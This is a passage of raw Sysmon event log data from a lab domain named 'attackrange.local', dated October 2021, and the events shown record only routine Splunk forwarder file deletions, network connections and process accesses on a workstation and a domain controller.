354300x800000000000000081073Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:47.582{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50002-false10.0.1.12-8000- 23542300x800000000000000081075Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:51.499{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=220596FAA0BE9BE9B52737C02A134DFB,SHA256=A0DD9EFE1808528A7CBCB1ED9FE355E3D319E404F32CBD98EFDF523E831E22CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:51.269{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61DD3EF036E8194827EC3A822A214518,SHA256=D9A1CA15488E2113A6F3804DC834BC99CE20F63E6F569D89D90875FB510B16C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081076Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:52.609{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C9246DCA1A0A9488097B9318853200,SHA256=2AAD347ABC6A092BC82C79AE9F2B9179679B5897110B0874BAF2D976ECD338C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:52.315{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=035F836103E15D78B7DD43F95B9EE065,SHA256=43BB06C614012B155A48E2C414A517DDA9CE8EEA8D5E50E9A10906CB2FCD2774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081078Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:53.617{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C120DB44AD33B8FE2582B76502D8FBC9,SHA256=71B1C864B46ABA42DBB08A29FF701D972EEA3FC0F80975E2D407DD12F9BCB957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:53.315{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2C9609B8BBFC346AF36482A751A8A67,SHA256=63917E4F664A4F3DEAFAC25CFEA68B45546E5D900A3EB2780F6E8E24A9C51799,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081077Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:53.550{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-021MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081081Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:54.725{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E268FB9A7CE7990AADF4575213AF0B3D,SHA256=AA7EB89AC17EFE4CD409D40F2ED4CA0EA22D03969BB1A57E9B17E0948138192C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:54.315{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3271F68C91AF8FA1F51731F89695CD8,SHA256=8C468360312E30C08AB2D4A51DABF38451C0E73DBFB71D175CFC4AFAE1BEC8FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081080Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:52.647{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50003-false10.0.1.12-8000- 23542300x800000000000000081079Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:54.555{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-022MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081082Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:55.773{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFBAAC0EA1E354E4438D6DB32639B4F0,SHA256=DEB1E1038655967983A277CB22DED80611D63419E110678C06457792DFF2FCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:55.362{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=446AB7EBA03AE341CB963E8183C2A97A,SHA256=26E267FC66343D71927CAC00614C54EA343DB4EC5F91CE21CBF61822496479CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:53.284{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49498-false10.0.1.12-8000- 23542300x800000000000000081083Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:56.818{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0472CA2FE94A89F287C004397E2D60C0,SHA256=7297EBF5D6D9A09A89E6A1C725556C5A0089B4238B1186A831419229D65B9660,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:56.790{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:56.399{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=169A26FE93E192E82096BB0BECEE06A1,SHA256=C4E7CF6E47A71590039DC1E66EDE62505D7DE5E147640A2B1A96717A1701F1AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081084Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:57.818{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911D0C978E58A1B00699EC4A581A2B39,SHA256=04A9524A00EC1D37B8BA44B041BF7DCB263D321AA51404AE6E8C5D550CB8F0A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:57.399{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696DEDE8A028265414455F50869F082B,SHA256=132B3CB8B98D0109ED3F85404FABEEA9829CAFA7264BAAF3C885E3E2FEF2CF0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081085Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:58.943{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8D736FD83D43011370855CF1499BDFB,SHA256=796132116DADB14755D18DAD3150FAE018CF3FA3452DD7D1383D6652F46DB9DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.915{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EA-615A-BC01-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B1EA-615A-BC01-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EA-615A-BC01-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.665{58E9C193-B1EA-615A-BC01-00000000FC01}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:58.524{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EAC8532AF8F4FC68E3695D234B68AC7,SHA256=0596598C1F031FBEA0E2F51554599BFF6F06AF2AD99B0C9DC1A4068536DC51D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:57.009{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49499-false10.0.1.12-8089- 23542300x800000000000000081099Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:59.958{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2ADB0FE8C888BD362DDC77C52E17AD9,SHA256=6E25E4AF5F48503786A926234B75B4780584CC0DBE09FC1EF7B87798BB8307B2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103186Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1EB-615A-BD01-00000000FC01}6052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103185Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103184Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103183Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103181Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B1EB-615A-BD01-00000000FC01}6052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103180Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:59.743{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1EB-615A-BD01-00000000FC01}6052C:\Program 